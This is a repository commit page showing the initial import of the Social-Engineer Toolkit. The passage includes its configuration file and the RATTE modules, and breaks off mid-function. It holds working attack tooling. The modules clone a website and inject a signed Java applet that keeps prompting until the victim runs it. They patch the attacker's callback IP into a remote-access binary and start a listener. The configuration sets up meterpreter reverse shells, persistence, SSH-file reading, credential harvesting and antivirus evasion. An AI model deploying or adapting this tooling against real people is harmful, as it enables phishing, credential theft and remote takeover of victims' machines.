Mirrors/social-engineer-toolkit
2
0
Fork 0
mirror of https://github.com/trustedsec/social-engineer-toolkit synced 2024-11-21 20:13:04 +00:00
Code Issues Projects Releases Packages Wiki Activity

Main conversation over to git via svn

Browse source
This commit is contained in:
David Kennedy 2012-12-31 17:11:37 -05:00
commit 3e54b7f66e
309 changed files with 46637 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

0
config/__init__.py Normal file
View file

BIN
config/__init__.pyc Normal file
View file

Binary file not shown.

4
config/mailing_list.txt Normal file
View file

@ -0,0 +1,4 @@
bob@bob.com
example@bob.com
here@bob.com
what@bob.com

260
config/set_config Normal file
View file

@ -0,0 +1,260 @@
##################################################################################################
##################################################################################################
## ##
## The following config file will allow you to customize settings within ##
## the Social Engineer Toolkit. The lines that do not have comment code ##
## ("#") are the fields you want to toy with. They are pretty easy to ##
## understand. ##
## ##
## The Metasploit path is the default path for where Metasploit is located. ##
## Metasploit is required for SET to function properly. ##
## ##
## The ETTERCAP function specifies if you want to use ARP Cache poisoning in ##
## conjunction with the web attacks, note that ARP Cache poisoning is only ##
## for internal subnets only and does not work against people on the internet. ##
## ##
## The SENDMAIL option allows you to spoof source IP addresses utilizing an ##
## application called SendMail. Sendmail is NOT installed by default on BackTrack5. ##
## To spoof email addresses when performing the mass email attacks, you must ##
## install Sendmail manually using: apt-get install sendmail ##
## ##
## Note that ETTERCAP and SENDMAIL flags only accept ON or OFF switches. ##
## ##
## Note that the Metasploit_PATH cannot have a / after the folder name. ##
## ##
## There are additional options, read the comments for additional descriptions. ##
## ##
##################################################################################################
##################################################################################################
#
### Define the path to MetaSploit, for example: /pentest/exploits/framework3
METASPLOIT_PATH=/opt/metasploit/msf3
#
### This will tell what database to use when using the MetaSploit functionality. Default is PostgreSQL
METASPLOIT_DATABASE=postgresql
#
### How many times SET should encode a payload if you are using standard MetaSploit encoding options
ENCOUNT=4
#
### If this options i set, the MetaSploit payloads will automatically migrate to
### notepad once the applet is executed. This is beneficial if the victim closes
### the browser, however can introduce buggy results when auto migrating.
### NOTE: This will make bypassuac not work properly. Migrate to a different process to get it to work.
AUTO_MIGRATE=OFF
#
### Custom exe you want to use for MetaSploit encoding, this usually has better av
### detection. Currently it is set to legit.binary which is just calc.exe. An example
### you could use would be putty.exe so this field would be /pathtoexe/putty.exe
CUSTOM_EXE=legit.binary
#
### This is for the backdoored executable if you want to keep the executable to still work. Normally
### when legit.binary is used, it will render the application useless. Specifying this will keep the
### application working
BACKDOOR_EXECUTION=ON
#
### Here we can run multiple meterpreter scripts once a session is active. This
### may be important if we are sleeping and need to run persistence, try to elevate
### permissions and other tasks in an automated fashion. First turn this trigger on
### then configure the flags. Note that you need to separate the commands by a ;
METERPRETER_MULTI_SCRIPT=OFF
LINUX_METERPRETER_MULTI_SCRIPT=OFF
#
### What commands do you want to run once a meterpreter session has been established.
### Be sure if you want multiple commands to separate with a ;. For example you could do
### run getsystem;run hashdump;run persistence to run three different commands
METERPRETER_MULTI_COMMANDS=run persistence -r 192.168.1.5 -p 21 -i 300 -X -A;getsystem
LINUX_METERPRETER_MULTI_COMMANDS=uname;id;cat ~/.ssh/known_hosts
#
### This is the port that is used for the iFrame injection using the metasploit browser attacks.
### By default this port is 8080 however egress filtering may block this. May want to adjust to
### something like 21 or 53
METASPLOIT_IFRAME_PORT=8080
#
### Define to use Ettercap or not when using website attack only - set to ON and OFF
ETTERCAP=OFF
#
### Ettercap home directory (needed for DNS_spoof)
ETTERCAP_PATH=/usr/share/ettercap
#
### Specify what interface you want ettercap or DSNiff to listen on, if nothing will default
ETTERCAP_INTERFACE=eth0
#
### Define to use dsniff or not when using website attack only - set to on and off
### If dsniff is set to on, ettercap will automatically be disabled.
DSNIFF=OFF
#
### Auto detection of IP address interface utilizing Google, set this ON if you want
AUTO_DETECT=OFF
#
### SendMail ON or OFF for spoofing email addresses
SENDMAIL=OFF
#
### Email provider list supports GMail, Hotmail, and Yahoo. Simply change it to the provider you want.
EMAIL_PROVIDER=GMAIL
#
### Set to ON if you want to use Email in conjunction with webattack
WEBATTACK_EMAIL=OFF
#
### Man Left In The Middle port, this will be used for the web server bind port
MLITM_PORT=80
#
### Use Apache instead of the standard Python web server. This will increase the speed
### of the attack vector.
APACHE_SERVER=OFF
#
### Path to the Apache web root
APACHE_DIRECTORY=/var/www
#
### Specify what port to run the http server off of that serves the java applet attack
### or metasploit exploit. Default is port 80. This also goes if you are using apache_server equal on.
### You need to specify what port Apache is listening on in order for this to work properly.
WEB_PORT=80
#
### Create self-signed Java applets and spoof publisher note this requires you to
### install ---> Java 6 JDK, BT5 or Ubuntu users: apt-get install openjdk-6-jdk
### If this is not installed it will not work. Can also do: apt-get install sun-java6-jdk
SELF_SIGNED_APPLET=OFF
#
### This flag will set the java id flag within the java applet to something different.
### This could be to make it look more believable or for better obfuscation
JAVA_ID_PARAM=Trusted Java Applet (VERIFIED SAFE)
#
### Java applet repeater option will continue to prompt the user with the java applet if
### the user hits cancel. This means it will be non stop until run is executed. This gives
### a better success rate for the Java applet attack
JAVA_REPEATER=ON
#
### Java repeater timing which is the delay it takes between the user hitting cancel to
### when the next Java applet runs. Be careful setting to low as it will spawn them over
### and over even if they hit run. 200 equals 2 seconds.
JAVA_TIME=200
#
### Turn on ssl certificates for set secure communications through web_attack vector
WEBATTACK_SSL=OFF
#
### Path to the pem file to utilize certificates with the web attack vector (required)
### You can create your own utilizing set, just turn on self_signed_cert
### If your using this flag, ensure openssl is installed! To turn this on turn SELF_SIGNED_CERT
### to the on position.
SELF_SIGNED_CERT=OFF
#
### Below is the client/server (private) cert, this must be in pem format in order to work
### Simply place the path you want. For example /root/ssl_client/server.pem
PEM_CLIENT=/root/newcert.pem
PEM_SERVER=/root/newreq.pem
#
### Tweak the web jacking time used for the iFrame replace, sometimes it can be a little slow
### and harder to convince the victim. 5000 = 5 seconds
WEBJACKING_TIME=2000
#
### Command center interface to bind to by default it is localhost only. If you want to enable it
### so you can hit the command center remotely put the interface to 0.0.0.0 to bind to all interfaces.
COMMAND_CENTER_INTERFACE=127.0.0.1
#
### Port for the command center
COMMAND_CENTER_PORT=44444
#
### This will remove the set interactive shell from the menu selection. The SET payloads are large in nature
### and things like the pwniexpress need smaller set builds
SET_INTERACTIVE_SHELL=ON
#
### What do you want to use for your default terminal within the command center. The default is xterm
### the options you have are as follow - gnome, konsole, xterm, solo. If you select solo it will place
### all results in the same shell you used to open the set-web interface. This is useful if your using
### something that only has one console, such as an iPhone or iPad.
TERMINAL=SOLO
#
### Digital signature stealing method must have the pefile Python modules loaded
### from http://code.google.com/p/pefile/. Be sure to install this before turning
### this flag on!!! This flag gives much better AV detection
DIGITAL_SIGNATURE_STEAL=ON
#
### These two options will turn the upx packer to on and automatically attempt
### to pack the executable which may evade anti-virus a little better.
UPX_ENCODE=ON
UPX_PATH=/usr/bin/upx
#
### This feature will turn on or off the automatic redirection. By default for example in multi-attack
### the site will redirect once one successful attack is used. Some people may want to use Java applet
### and credential harvester for example.
AUTO_REDIRECT=ON
#
### This will redirect the harvester victim to this website once executed and not to the original website.
### For example if you clone abcompany.com and below it says blahblahcompany.com, it will redirect there instead.
### THIS IS USEFUL IF YOU WANT TO REDIRECT THE VICTIM TO AN ADDITIONAL SITE AFTER HARVESTER HAS TAKEN THE CREDENTIALS.
### SIMPLY TURN HARVESTER REDIRECT TO ON THEN ENTER HTTP://WEBSITEOFYOURCHOOSING.COM IN THE HARVESTER URL BELOW
### TO CHANGE.
HARVESTER_REDIRECT=OFF
HARVESTER_URL=http://thishasnotbeenset
#
### This feature will auto embed a img src tag to a unc path of your attack machine.
### Useful if you want to intercept the half lm keys with rainbowtables. What will happen
### is as soon as the victim clicks the web-page link, a unc path will be initiated
### and the metasploit capture/smb module will intercept the hash values.
UNC_EMBED=OFF
#
### This feature will attempt to turn create a rogue access point and redirect victims back to the
### set web server when associated. airbase-ng and dnsspoof.
ACCESS_POINT_SSID=linksys
AIRBASE_NG_PATH=/usr/local/sbin/airbase-ng
DNSSPOOF_PATH=/usr/local/sbin/dnsspoof
#
### This will configure the default channel that the wireless access point attack broadcasts on through wifi
### communications.
AP_CHANNEL=9
#
### This will enable the powershell shellcode injection technique with each java applet. It will be used as
### a second form in case the first method fails.
POWERSHELL_INJECTION=ON
#
### This will allow you to change the Metasploit payload to whatever you want based on the powershell alphanumeric
### injection attack. Specify this if POWERSHELL INJECTION is set to ON and you want to change it from the standard
### reverse_tcp attack. NOTE: payloads need to be specific to operating system i.e. x64 and x86
POWERSHELL_INJECT_PAYLOAD_X64=windows/x64/meterpreter/reverse_tcp
POWERSHELL_INJECT_PAYLOAD_X86=windows/meterpreter/reverse_tcp
#
### This will display the output of the powershell injection attack so you can see what is being placed on the
### system.
POWERSHELL_VERBOSE=OFF
#
### This will profile the victim machine and check for installed versions and report back on them
### note this is currently disabled. Development is underway on this feature
WEB_PROFILER=OFF
#
### Port numbers for the java applet attack linux/osx attacks, reverse payloads
DEPLOY_OSX_LINUX_PAYLOADS=OFF
OSX_REVERSE_PORT=8080
LINUX_REVERSE_PORT=8081
#
### User agent string for when using anything that clones the website, this user agent will be used
USER_AGENT_STRING=Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
#
### The way the set interactive shell works is it first deploys a stager payload that pulls an additional executable.
### The downloader is currently being picked up by a/v and is actually somewhat hard to obfuscate because it does
### similar characteristics of a download/exec. If you turn this feature on, set will download the interactive shell
### straight without using the stager. Only issue with this is there may be a delay on the user end however still
### shouldn't be noticed
SET_SHELL_STAGER=OFF
#
### Disables automatic listener - turn this off if you don't want a metasploit listener in the background.
AUTOMATIC_LISTENER=ON
#
### This will disable the functionality if metasploit is not installed and you just want to use setoolkit or ratte for payloads
### or the other attack vectors.
METASPLOIT_MODE=ON
#
### THIS WILL TURN OFF DEPLOYMENT OF BINARIES FOR THE JAVA APPLET ATTACK AND ONLY USE THE POWERSHELL METHOD.
### NOTE THAT POWERSHELL_INJECTION MUST BE SET TO ON
DEPLOY_BINARIES=YES
#
### THIS IS FOR DEBUG PURPOSES ONLY. THIS WILL REMOVE THE CLEANUP FUNCTIONALITY WITHIN SET TO DEBUG FILE STATES
CLEANUP_ENABLED_DEBUG=OFF
#
### WHEN SENDING EMAILS OUT, SET WILL ADD A URL AND KEEP TRACK OF THE EMAIL ADDRESSES ON EACH UNIQUE LINK. THIS WILL HELP YOU FIND
### WHO CLICKED ON THE LINK AND FROM WHAT PERSON / EMAIL ADDRESS WAS USED. THIS WORKS ON ALL WEB-BASED ATTACKS AND SPEAR-PHISHING.
###
### NOTE: IN ORDER FOR THIS TO WORK YOU MUST ENABLE WEBATTACK_EMAIL and APACHE_SERVER TO ON.
###
TRACK_EMAIL_ADDRESSES=OFF
#
#######################################################################################################################################

77
config/set_config.py Normal file
View file

@ -0,0 +1,77 @@
#!/usr/bin/python
#######################################################################
## DO NOT MODIFY THIS FILE ##
#######################################################################
# This file is generated by a routine inside SET, for use by SET. #
# #
# Settings should be modified in the set_config file, and then #
# SET updated using the 'Update SET Configuration' menu item in #
# the main menu. This file will be updated with the new settings. #
# #
# set_config.py generated: 2012-12-30 11:03:25.535667 #
# #
#######################################################################
CONFIG_DATE='2012-12-30 11:03:25.535667'
METASPLOIT_PATH="/opt/metasploit/msf3"
METASPLOIT_DATABASE="postgresql"
ENCOUNT=4
AUTO_MIGRATE=False
CUSTOM_EXE="legit.binary"
BACKDOOR_EXECUTION=True
METERPRETER_MULTI_SCRIPT=False
LINUX_METERPRETER_MULTI_SCRIPT=False
METERPRETER_MULTI_COMMANDS="run persistence -r 192.168.1.5 -p 21 -i 300 -X -A;getsystem"
LINUX_METERPRETER_MULTI_COMMANDS="uname;id;cat ~/.ssh/known_hosts"
METASPLOIT_IFRAME_PORT=8080
ETTERCAP=False
ETTERCAP_PATH="/usr/share/ettercap"
ETTERCAP_INTERFACE="eth0"
DSNIFF=False
AUTO_DETECT=False
SENDMAIL=False
EMAIL_PROVIDER="GMAIL"
WEBATTACK_EMAIL=False
MLITM_PORT=80
APACHE_SERVER=False
APACHE_DIRECTORY="/var/www"
WEB_PORT=80
SELF_SIGNED_APPLET=False
JAVA_ID_PARAM="Trusted Java Applet (VERIFIED SAFE)"
JAVA_REPEATER=True
JAVA_TIME="200"
WEBATTACK_SSL=False
SELF_SIGNED_CERT=False
PEM_CLIENT="/root/newcert.pem"
PEM_SERVER="/root/newreq.pem"
WEBJACKING_TIME=2000
COMMAND_CENTER_INTERFACE="127.0.0.1"
COMMAND_CENTER_PORT=44444
SET_INTERACTIVE_SHELL=True
TERMINAL="SOLO"
DIGITAL_SIGNATURE_STEAL=True
UPX_ENCODE=True
UPX_PATH="/usr/bin/upx"
AUTO_REDIRECT=True
HARVESTER_REDIRECT=False
HARVESTER_URL="http://thishasnotbeenset"
UNC_EMBED=False
ACCESS_POINT_SSID="linksys"
AIRBASE_NG_PATH="/usr/local/sbin/airbase-ng"
DNSSPOOF_PATH="/usr/local/sbin/dnsspoof"
AP_CHANNEL=9
POWERSHELL_INJECTION=True
POWERSHELL_INJECT_PAYLOAD_X64="windows/x64/meterpreter/reverse_tcp"
POWERSHELL_INJECT_PAYLOAD_X86="windows/meterpreter/reverse_tcp"
POWERSHELL_VERBOSE=False
WEB_PROFILER=False
DEPLOY_OSX_LINUX_PAYLOADS="False"
OSX_REVERSE_PORT=8080
LINUX_REVERSE_PORT=8081
USER_AGENT_STRING="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
SET_SHELL_STAGER=False
AUTOMATIC_LISTENER=True
METASPLOIT_MODE=True
DEPLOY_BINARIES="YES"
CLEANUP_ENABLED_DEBUG="False"
TRACK_EMAIL_ADDRESSES="False"

BIN
config/set_config.pyc Normal file
View file

Binary file not shown.

15
config/slim_set.py Normal file
View file

@ -0,0 +1,15 @@
#!/usr/bin/python
import subprocess
#
#
# small script to slim down set
#
#
choice=raw_input("Do you want to slim the size of SET down? This will remove SET interactive payloads and other executables.\nEnter your choice [yes|no]: ")
if choice == "y" or choice == "yes":
if os.path.isfile("src/payloads/set_payloads/set.payload"):
path = "src/payloads/set_payloads/"
if os.path.isfile("../src/payloads/set_payloads/set.payload"):
path = "../src/payloads/set_payloads/"
subprocess.Popen("rm -rf %s/* 1> /dev/null 2> /dev/null" % (path), shell=True).wait()
print "Done. Be sure to change the set_config to SET_PAYLOADS=OFF"

143
config/update_config.py Normal file
View file

@ -0,0 +1,143 @@
#!/usr/bin/python
"""
update_config.py:
This module converts the user-editable set_config text file
into a python module file. This allows the user to edit
the configuration with easily understandable values such
as "ON" or "OFF", but yet SET operates with a module from
which variables can be imported and boolean values operated
upon.
"""
import os
from src.core.setcore import print_status, print_info, print_error, return_continue
import datetime
from time import sleep
definepath = os.getcwd()
# TODO
# * integers should not have quotes
# * paths should be double-quoted
# * Booleans should not be quoted
def value_type(value):
""" Determines whether the setting parameter should be quoted. """
return {
'METASPLOIT_PATH':True,
'METASPLOIT_DATABASE':True,
'ENCOUNT':False,
'AUTO_MIGRATE':False,
'CUSTOM_EXE':True,
'BACKDOOR_EXECUTION':False,
'METERPRETER_MULTI_SCRIPT':False,
'LINUX_METERPRETER_MULTI_SCRIPT':False,
'METERPRETER_MULTI_COMMANDS':True,
'LINUX_METERPRETER_MULTI_COMMANDS':True,
'METASPLOIT_IFRAME_PORT':False,
'ETTERCAP':False,
'ETTERCAP_PATH':True,
'ETTERCAP_DSNIFF_INTERFACE':True,
'DSNIFF':False,
'AUTO_DETECT':False,
'SENDMAIL':False,
'EMAIL_PROVIDER':True,
'WEBATTACK_EMAIL':False,
'MLITM_PORT':False,
'APACHE_SERVER':False,
'APACHE_DIRECTORY':True,
'WEB_PORT':False,
'SELF_SIGNED_APPLET':False,
'JAVA_ID_PARAM':True,
'JAVA_REPEATER':False,
'JAVA_TIME':True,
'WEBATTACK_SSL':False,
'SELF_SIGNED_CERT':False,
'PEM_CLIENT':True,
'PEM_SERVER':True,
'WEBJACKING_TIME':False,
'COMMAND_CENTER_INTERFACE':True,
'COMMAND_CENTER_PORT':False,
'SET_INTERACTIVE_SHELL':False,
'TERMINAL':True,
'DIGITAL_SIGNATURE_STEAL':False,
'UPX_ENCODE':False,
'UPX_PATH':True,
'AUTO_REDIRECT':False,
'HARVESTER_REDIRECT':False,
'HARVESTER_URL':True,
'UNC_EMBED':False,
'ACCESS_POINT_SSID':True,
'AIRBASE_NG_PATH':True,
'DNSSPOOF_PATH':True,
'AP_CHANNEL':False,
'POWERSHELL_INJECTION':False,
'POWERSHELL_VERBOSE':False,
'WEB_PROFILER':False,
'OSX_REVERSE_PORT':False,
'LINUX_REVERSE_PORT':False,
'USER_AGENT_STRING':True,
'SET_SHELL_STAGER':False,
'AUTOMATIC_LISTENER':False,
'METASPLOIT_MODE':False
}.get(value,"ERROR")
def update_config():
init_file = file("%s/config/set_config" % (definepath), "r")
new_config = file("%s/config/set_config.py" % (definepath), "w")
timestamp = str(datetime.datetime.now())
new_config.write("""#!/usr/bin/python\n
#######################################################################
## DO NOT MODIFY THIS FILE ##
#######################################################################
# This file is generated by a routine inside SET, for use by SET. #
# #
# Settings should be modified in the set_config file, and then #
# SET updated using the 'Update SET Configuration' menu item in #
# the main menu. This file will be updated with the new settings. #
# #
# set_config.py generated: """ + timestamp + """ #
# #
#######################################################################
CONFIG_DATE='"""+timestamp+"""'\n""")
for line in init_file:
if not line.startswith("#"):
line = line.rstrip()
line = line.split("=")
setting = line[0]
value = line[1]
if value == "ON":
value = "True"
elif value == "OFF":
value = "False"
else:
pass
quoted = value_type(setting)
if quoted:
new_config.write(setting + '="' + value + '"\n')
else:
new_config.write(setting + '=' + value + '\n')
init_file.close()
new_config.close()
sleep(1)
from set_config import CONFIG_DATE as verify
print_info("New set_config.py file generated on: %s" % timestamp)
print_info("Verifying configuration update...")
if verify == timestamp:
print_status("Update verified, config timestamp is: %s" % timestamp)
else:
print_error("Update failed? Timestamp on config file is: %s" % verify)
print_status("SET is using the new config, no need to restart")
# return_continue()
if __name__ == "__main__":
update_config()

BIN
config/update_config.pyc Normal file
View file

Binary file not shown.

274
modules/ratte_module.py Executable file
View file

@ -0,0 +1,274 @@
#!/usr/bin/env python
#
# These are required fields
#
import sys
import subprocess
import os
from src.core.menu import text
from src.core import setcore as core
from time import sleep
import urlparse
# switch over to import core
#sys.path.append("src/core")
# import the core modules
#try: reload(core)
#except: import core
definepath = os.getcwd()
MAIN=" RATTE Java Applet Attack (Remote Administration Tool Tommy Edition) - Read the readme/RATTE_README.txt first"
#This is RATTE (Remote Administration Tool Tommy Edition) attack module. It will launch a java applet attack to inject RATTE. Then it will launch RATTE-Server and wait for victim to connect. RATTE can beat local Firewalls, IDS and even EAL 4+ certified network firewalls.
#This release one is only for education!"
AUTHOR=" Thomas Werth"
httpd=None
#
# This will start a web server in the directory root you specify, so for example
# you clone a website then run it in that web server, it will pull any index.html file
#
def start_web_server_tw(directory,port):
global httpd
try:
# import the threading, socketserver, and simplehttpserver
import thread,SocketServer,SimpleHTTPServer
# create the httpd handler for the simplehttpserver
# we set the allow_reuse_address incase something hangs can still bind to port
class ReusableTCPServer(SocketServer.TCPServer): allow_reuse_address=True
# specify the httpd service on 0.0.0.0 (all interfaces) on port 80
httpd = ReusableTCPServer(("0.0.0.0", port),SimpleHTTPServer.SimpleHTTPRequestHandler)
# thread this mofo
thread.start_new_thread(httpd.serve_forever,())
# change directory to the path we specify for output path
os.chdir(directory)
# handle keyboard interrupts
except KeyboardInterrupt:
core.print_info("Exiting the SET web server...")
httpd.socket.close()
# handle the rest
#except Exception:
# print "[*] Exiting the SET web server...\n"
# httpd.socket.close()
def stop_web_server_tw():
global httpd
try:
httpd.socket.close()
# handle the exception
except Exception:
httpd.socket.close()
#
# This will create the java applet attack from start to finish.
# Includes payload (reverse_meterpreter for now) cloning website
# and additional capabilities.
#
def java_applet_attack_tw(website,port,directory,ipaddr):
# clone the website and inject java applet
core.site_cloner(website,directory,"java")
############################################
# use customized Ratte nehmen
############################################
# this part is needed to rename the msf.exe file to a randomly generated one
if os.path.isfile("src/program_junk/rand_gen"):
# open the file
fileopen=file("src/program_junk/rand_gen", "r")
# start a loop
for line in fileopen:
# define executable name and rename it
filename=line.rstrip()
# move the file to the specified directory and filename
subprocess.Popen("cp src/payloads//ratte/ratte.binary %s/%s 1> /dev/null 2> /dev/null" % (directory,filename), shell=True).wait()
# lastly we need to copy over the signed applet
subprocess.Popen("cp src/program_junk/Signed_Update.jar %s 1> /dev/null 2> /dev/null" % (directory), shell=True).wait()
#TODO index.html parsen und IPADDR:Port ersetzen
fileopen=open("%s/index.html" % (directory), "rb")
data=fileopen.read()
fileopen.close()
filewrite=open("%s/index.html" % (directory), "wb")
toReplace=core.grab_ipaddress()+":80"
#replace 3 times
filewrite.write(data.replace(str(toReplace), ipaddr+":"+str(port), 3) )
filewrite.close()
# start the web server by running it in the background
start_web_server_tw(directory,port)
#
# Start ratteserver
#
def ratte_listener_start(port):
# launch ratteserver using ../ cause of reports/ subdir
#subprocess.Popen("%s/src/set_payloads/ratte/ratteserver %d" % (os.getcwd(),port), shell=True).wait()
subprocess.Popen("../src/payloads/ratte/ratteserver %d" % (port), shell=True).wait()
def prepare_ratte(ipaddr,ratteport, persistent,customexe):
core.print_status("preparing RATTE...")
# replace ipaddress with one that we need for reverse connection back
############
#Load content of RATTE
############
fileopen=open("src/payloads/ratte/ratte.binary" , "rb")
data=fileopen.read()
fileopen.close()
############
#PATCH Server IP into RATTE
############
filewrite=open("src/program_junk/ratteM.exe", "wb")
host=int(len(ipaddr)+1) * "X"
rPort=int(len(str(ratteport))+1) * "Y"
pers=int(len(str(persistent))+1) * "Z"
#check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!)
if len(str(customexe)) > 0:
cexe=int(len(str(customexe))+1) * "Q"
else:
cexe=""
filewrite.write(data.replace(str(cexe), customexe+"\x00", 1).replace(str(pers), persistent+"\x00", 1).replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
filewrite.close()
# def main(): header is required
def main():
valid_site = False
valid_ip = False
valid_persistence = False
input_counter= 0
site_input_counter=0
#pause=raw_input("This module has finished completing. Press <enter> to continue")
# Get a *VALID* website address
while valid_site != True and site_input_counter < 3:
website = raw_input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
site = urlparse.urlparse(website)
if site.scheme == "http" or site.scheme == "https":
if site.netloc != "":
valid_site = True
else:
if site_input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?" + core.bcolors.ENDC)
sleep(4)
return
else:
core.print_warning("I can't determine the fqdn or IP of the site. Try again?")
site_input_counter += 1
else:
if site_input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
core.print_warning("I couldn't determine whether this is an http or https site. Try again?")
site_input_counter +=1
#core.DebugInfo("site.scheme is: %s " % site.scheme)
#core.DebugInfo("site.netloc is: %s " % site.netloc)
#core.DebugInfo("site.path is: %s " % site.path)
#core.DebugInfo("site.params are: %s " % site.params)
#core.DebugInfo("site.query is: %s " % site.query)
#core.DebugInfo("site.fragment is: %s " % site.fragment)
while valid_ip != True and input_counter < 3:
ipaddr = raw_input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
#javaport must be 80, cause applet uses in web injection port 80 to download payload!
try:
javaport = int(raw_input(core.setprompt(["9", "2"], "Port Java applet should listen on [80]")))
while javaport == 0 or javaport > 65535:
if javaport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if javaport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
javaport = int(raw_input(core.setprompt(["9", "2"],"Port Java applet should listen on [80]")))
except ValueError:
#core.print_info("Port set to default of 80")
javaport = 80
#javaport=80
try:
ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
while ratteport == javaport or ratteport == 0 or ratteport > 65535:
if ratteport == javaport:
core.print_warning("Port must not be equal to javaport!")
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
except ValueError:
ratteport = 8080
persistent = core.yesno_prompt(["9","2"], "Should RATTE be persistentententent [no|yes]?")
# j0fer 06-27-2012 # while valid_persistence != True:
# j0fer 06-27-2012 # persistent=raw_input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# j0fer 06-27-2012 # persistent=str.lower(persistent)
# j0fer 06-27-2012 # if persistent == "no" or persistent == "n":
# j0fer 06-27-2012 # persistent="NO"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # elif persistent == "yes" or persistent == "y":
# j0fer 06-27-2012 # persistent="YES"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # else:
# j0fer 06-27-2012 # core.print_warning(text.YES_NO_RESPONSES)
customexe=raw_input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
#######################################
# prepare RATTE
#######################################
prepare_ratte(ipaddr,ratteport,persistent,customexe)
######################################
# Java Applet Attack to deploy RATTE
#######################################
core.print_info("Starting java applet attack...")
java_applet_attack_tw(website,javaport, "reports/",ipaddr)
fileopen=file("%s/src/program_junk/rand_gen" % (definepath), "r")
for line in fileopen:
ratte_random = line.rstrip()
subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" % (definepath,definepath,ratte_random), shell=True).wait()
#######################
# start ratteserver
#######################
core.print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
######################
# stop webserver
######################
stop_web_server_tw()
return

150
modules/ratte_only_module.py Executable file
View file

@ -0,0 +1,150 @@
#!/usr/bin/env python
#
# These are required fields
#
import sys
import subprocess
import os
from src.core.setcore import *
from time import sleep
from src.core.menu import text
# "This is RATTE (Remote Administration Tool Tommy Edition) prepare module.It will prepare a custom ratteM.exe."
MAIN=" RATTE (Remote Administration Tool Tommy Edition) Create Payload only. Read the readme/RATTE-Readme.txt first"
AUTHOR=" Thomas Werth"
#
# Start ratteserver
#
def ratte_listener_start(port):
subprocess.Popen("src/payloads/ratte/ratteserver %d" % (port), shell=True).wait()
def prepare_ratte(ipaddr,ratteport, persistent,customexe):
print_info("preparing RATTE...")
# replace ipaddress with one that we need for reverse connection back
############
#Load content of RATTE
############
fileopen=open("src/payloads/ratte/ratte.binary" , "rb")
data=fileopen.read()
fileopen.close()
############
#PATCH Server IP into RATTE
############
filewrite=open("src/program_junk/ratteM.exe", "wb")
host=int(len(ipaddr)+1) * "X"
rPort=int(len(str(ratteport))+1) * "Y"
pers=int(len(str(persistent))+1) * "Z"
#check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!)
if len(str(customexe)) > 0:
cexe=int(len(str(customexe))+1) * "Q"
else:
cexe=""
filewrite.write(data.replace(str(cexe), customexe+"\x00", 1).replace(str(pers), persistent+"\x00", 1).replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
# filewrite.write(data.replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
#filewrite.write(data.replace(str(pers), persistent+"\x00", 1).replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
filewrite.close()
# def main(): header is required
def main():
valid_site = False
valid_ip = False
valid_response = False
input_counter=0
#################
# get User Input
#################
#ipaddr=raw_input(setprompt(["9", "2"], "IP address to connect back on"))
while valid_ip != True and input_counter < 3:
ipaddr = raw_input(setprompt(["9", "2"], "Enter the IP address to connect back on"))
valid_ip = validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
"""try:
ratteport=int(raw_input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
while ratteport==0 or ratteport > 65535:
print_warning('Port must not be equal to javaport!')
ratteport=int(raw_input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
except ValueError:
ratteport=8080"""
try:
ratteport = int(raw_input(setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
while ratteport == 0 or ratteport > 65535:
if ratteport == 0:
print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
print_warning(text.PORT_TOO_HIGH)
ratteport = int(raw_input(setprompt(["9", "2"],"Enter port RATTE Server should listen on [8080]")))
except ValueError:
#core.print_info("Port set to default of 8080")
ratteport = 8080
"""persistent=raw_input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
if persistent == 'no' or persistent == '' or persistent == 'n':
persistent='NO'
else:
persistent='YES'"""
while valid_response != True:
persistent=raw_input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
persistent=str.lower(persistent)
if persistent == "no" or persistent == "n":
persistent="NO"
valid_response = True
elif persistent == "yes" or persistent == "y":
persistent="YES"
valid_response = True
else:
print_warning(text.YES_NO_RESPONSES)
valid_response = False
customexe=raw_input(setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
############
# prepare RATTE
############
prepare_ratte(ipaddr,ratteport,persistent,customexe)
print_status("Payload has been exported to src/program_junk/ratteM.exe")
###################
# start ratteserver
###################
"""prompt=raw_input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
if prompt == "yes" or prompt == "" or prompt == "y":
print_info("Starting ratteserver...")
ratte_listener_start(ratteport)"""
while valid_response != True:
